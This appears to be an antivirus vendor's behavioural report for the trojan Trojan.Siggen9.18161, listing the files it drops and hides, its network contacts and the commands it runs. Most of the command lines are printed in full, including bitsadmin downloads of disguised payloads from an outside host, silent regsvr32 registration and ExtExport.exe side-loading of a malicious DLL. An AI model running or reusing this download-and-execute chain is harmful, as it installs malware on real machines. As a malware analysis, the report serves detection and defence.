Trojan.Siggen9.18161

Technical Information

Malicious functions

Creates and executes the following

'%WINDIR%\explorer.exe' /c, C:\Users\Public\Documents\hil26hI.js

Modifies file system

Creates the following files

C:\users\public\documents\hil26hi.js
nul
%APPDATA%\qdy4097273\bit2fb.tmp
%APPDATA%\qdy4097273\bit46cb.tmp
%APPDATA%\qdy4097273\bit58ed.tmp
%APPDATA%\qdy4097273\bit6820.tmp
%APPDATA%\qdy4097273\bit7800.tmp
%APPDATA%\qdy4097273\bit88e9.tmp
%APPDATA%\qdy4097273\bit99a3.tmp
%APPDATA%\qdy4097273\bitaada.tmp
%APPDATA%\qdy4097273\bitbae9.tmp
%APPDATA%\qdy4097273\bitcb64.tmp
%APPDATA%\qdy4097273\bitdd96.tmp
%APPDATA%\qdy4097273\bitecba.tmp
%APPDATA%\qdy4097273\r1.log
C:\users\public\h

Sets the 'hidden' attribute to the following files

%APPDATA%\qdy4097273\bit2fb.tmp
%APPDATA%\qdy4097273\bit46cb.tmp
%APPDATA%\qdy4097273\bit58ed.tmp
%APPDATA%\qdy4097273\bit6820.tmp
%APPDATA%\qdy4097273\bit7800.tmp
%APPDATA%\qdy4097273\bit88e9.tmp
%APPDATA%\qdy4097273\bit99a3.tmp
%APPDATA%\qdy4097273\bitaada.tmp
%APPDATA%\qdy4097273\bitbae9.tmp
%APPDATA%\qdy4097273\bitcb64.tmp
%APPDATA%\qdy4097273\bitdd96.tmp
%APPDATA%\qdy4097273\bitecba.tmp

Moves the following files

from %APPDATA%\qdy4097273\bit2fb.tmp to %APPDATA%\qdy4097273\mammonsysdwwn.gif
from %APPDATA%\qdy4097273\bit46cb.tmp to %APPDATA%\qdy4097273\mammonsysc.jpg
from %APPDATA%\qdy4097273\bit58ed.tmp to %APPDATA%\qdy4097273\mammonsysa.jpg
from %APPDATA%\qdy4097273\bit6820.tmp to %APPDATA%\qdy4097273\mammonsysb.jpg
from %APPDATA%\qdy4097273\bit7800.tmp to %APPDATA%\qdy4097273\mammonsysdx.gif
from %APPDATA%\qdy4097273\bit88e9.tmp to %APPDATA%\qdy4097273\mammonsysg.gif
from %APPDATA%\qdy4097273\bit99a3.tmp to %APPDATA%\qdy4097273\mammonsysgx.gif
from %APPDATA%\qdy4097273\bitaada.tmp to %APPDATA%\qdy4097273\mammonsysi.gif
from %APPDATA%\qdy4097273\bitbae9.tmp to %APPDATA%\qdy4097273\mammonsysxa.~
from %APPDATA%\qdy4097273\bitcb64.tmp to %APPDATA%\qdy4097273\mammonsysxb.~
from %APPDATA%\qdy4097273\bitdd96.tmp to %APPDATA%\qdy4097273\mammonsysxc.~
from %APPDATA%\qdy4097273\bitecba.tmp to %APPDATA%\qdy4097273\sqlite3.dll

Network activity

TCP

HTTP GET requests

http://wa##.###q5t5bqtol06.com.de/?01#

'r3####.##qaqdtwi8xg24.com.de':443

UDP

DNS ASK wa##.###q5t5bqtol06.com.de
DNS ASK r3####.##qaqdtwi8xg24.com.de

Miscellaneous

Searches for the following windows

ClassName: 'OSKMainClass' WindowName: ''

Creates and executes the following

'<SYSTEM32>\wscript.exe' "C:\Users\Public\Documents\hil26hI.js"
'<SYSTEM32>\cmd.exe' /c cd "%ProgramFiles(x86)%\Internet Explorer\" && ExtExport.exe "%APPDATA%\QDY4097273\sqlite3.dll" 2 3 4 FIREFOX {00000000-0000-0000-0000-000000000000}' (with hidden window)
'<SYSTEM32>\cmd.exe' /V /C "echo %APPDATA%\QDY4097273\>C:\Users\Public\h"&& exit' (with hidden window)
'<SYSTEM32>\cmd.exe' /V /C "echo xXx>%APPDATA%\QDY4097273\\r1.log"&& exit' (with hidden window)
'<SYSTEM32>\bitsadmin.exe' /transfer 68669 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsyshh60.dll.zip %APPDATA%\QDY4097273\sqlite3.dll' (with hidden window)
'<SYSTEM32>\bitsadmin.exe' /transfer 84922 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysxc.gif.zip %APPDATA%\QDY4097273\mammonsysxc.~' (with hidden window)
'<SYSTEM32>\bitsadmin.exe' /transfer 95580 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysxb.gif.zip %APPDATA%\QDY4097273\mammonsysxb.~' (with hidden window)
'<SYSTEM32>\bitsadmin.exe' /transfer 57620 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysxa.gif.zip %APPDATA%\QDY4097273\mammonsysxa.~' (with hidden window)
'<SYSTEM32>\regsvr32.exe' /s "%APPDATA%\QDY4097273\sqlite3.dll"' (with hidden window)
'<SYSTEM32>\bitsadmin.exe' /transfer 63854 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysi.gif.zip %APPDATA%\QDY4097273\mammonsysi.gif' (with hidden window)
'<SYSTEM32>\bitsadmin.exe' /transfer 45027 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysg.gif.zip %APPDATA%\QDY4097273\mammonsysg.gif' (with hidden window)
'<SYSTEM32>\bitsadmin.exe' /transfer 84016 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysdx.gif.zip %APPDATA%\QDY4097273\mammonsysdx.gif' (with hidden window)
'<SYSTEM32>\bitsadmin.exe' /transfer 34578 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysb.jpg.zip %APPDATA%\QDY4097273\mammonsysb.jpg' (with hidden window)
'<SYSTEM32>\bitsadmin.exe' /transfer 33449 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysa.jpg.zip %APPDATA%\QDY4097273\mammonsysa.jpg' (with hidden window)
'<SYSTEM32>\bitsadmin.exe' /transfer 80949 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysc.jpg.zip %APPDATA%\QDY4097273\mammonsysc.jpg' (with hidden window)
'<SYSTEM32>\bitsadmin.exe' /transfer 23778 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysdwwn.gif.zip %APPDATA%\QDY4097273\mammonsysdwwn.gif' (with hidden window)
'<SYSTEM32>\wscript.exe' "C:\Users\Public\Documents\hil26hI.js"' (with hidden window)
'<SYSTEM32>\bitsadmin.exe' /transfer 43402 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysgx.gif.zip %APPDATA%\QDY4097273\mammonsysgx.gif' (with hidden window)
'<SYSTEM32>\cmd.exe' /c echo %time% && timeout 4000 > NUL && exit' (with hidden window)

Executes the following

'<SYSTEM32>\cmd.exe' /S /D /c" sEt/p rmcxmir="%GIP:IARYKM=%%vvjef25:1PZTG=/%" 0<nul 1>C:\Users\Public\Documents\hil26hI.js"
'<SYSTEM32>\regsvr32.exe' /s "%APPDATA%\QDY4097273\sqlite3.dll"
'%ProgramFiles(x86)%\internet explorer\extexport.exe' "%APPDATA%\QDY4097273\sqlite3.dll" 2 3 4 FIREFOX {00000000-0000-0000-0000-000000000000}
'<SYSTEM32>\cmd.exe' /c cd "%ProgramFiles(x86)%\Internet Explorer\" && ExtExport.exe "%APPDATA%\QDY4097273\sqlite3.dll" 2 3 4 FIREFOX {00000000-0000-0000-0000-000000000000}
'<SYSTEM32>\cmd.exe' /V /C "echo %APPDATA%\QDY4097273\>C:\Users\Public\h"&& exit
'<SYSTEM32>\cmd.exe' /V /C "echo xXx>%APPDATA%\QDY4097273\\r1.log"&& exit
'<SYSTEM32>\bitsadmin.exe' /transfer 68669 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsyshh60.dll.zip %APPDATA%\QDY4097273\sqlite3.dll
'<SYSTEM32>\bitsadmin.exe' /transfer 84922 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysxc.gif.zip %APPDATA%\QDY4097273\mammonsysxc.~
'<SYSTEM32>\bitsadmin.exe' /transfer 95580 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysxb.gif.zip %APPDATA%\QDY4097273\mammonsysxb.~
'<SYSTEM32>\bitsadmin.exe' /transfer 57620 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysxa.gif.zip %APPDATA%\QDY4097273\mammonsysxa.~
'<SYSTEM32>\bitsadmin.exe' /transfer 63854 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysi.gif.zip %APPDATA%\QDY4097273\mammonsysi.gif
'<SYSTEM32>\bitsadmin.exe' /transfer 43402 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysgx.gif.zip %APPDATA%\QDY4097273\mammonsysgx.gif
'<SYSTEM32>\bitsadmin.exe' /transfer 45027 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysg.gif.zip %APPDATA%\QDY4097273\mammonsysg.gif
'<SYSTEM32>\bitsadmin.exe' /transfer 84016 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysdx.gif.zip %APPDATA%\QDY4097273\mammonsysdx.gif
'<SYSTEM32>\bitsadmin.exe' /transfer 34578 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysb.jpg.zip %APPDATA%\QDY4097273\mammonsysb.jpg
'<SYSTEM32>\bitsadmin.exe' /transfer 33449 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysa.jpg.zip %APPDATA%\QDY4097273\mammonsysa.jpg
'<SYSTEM32>\bitsadmin.exe' /transfer 80949 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysc.jpg.zip %APPDATA%\QDY4097273\mammonsysc.jpg
'<SYSTEM32>\bitsadmin.exe' /transfer 23778 /priority foreground https://r3aedh.xdqaqdtwi8xg24.com.de/09/mammonsysdwwn.gif.zip %APPDATA%\QDY4097273\mammonsysdwwn.gif
'<SYSTEM32>\cmd.exe' /S /D /c" echo SS468LRLK94DDWYIFJBMZMIEUF47 1>nul"
'<SYSTEM32>\cmd.exe' /S /D /c" exit 1>nul"
'<SYSTEM32>\cmd.exe' /S /D /c" cd %WINDIR% 1>nul"
'<SYSTEM32>\cmd.exe' /S /D /c" md \ |"
'<SYSTEM32>\cmd.exe' /c echo %time% && timeout 4000 > NUL && exit
'<SYSTEM32>\timeout.exe' 4000

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations

Free trial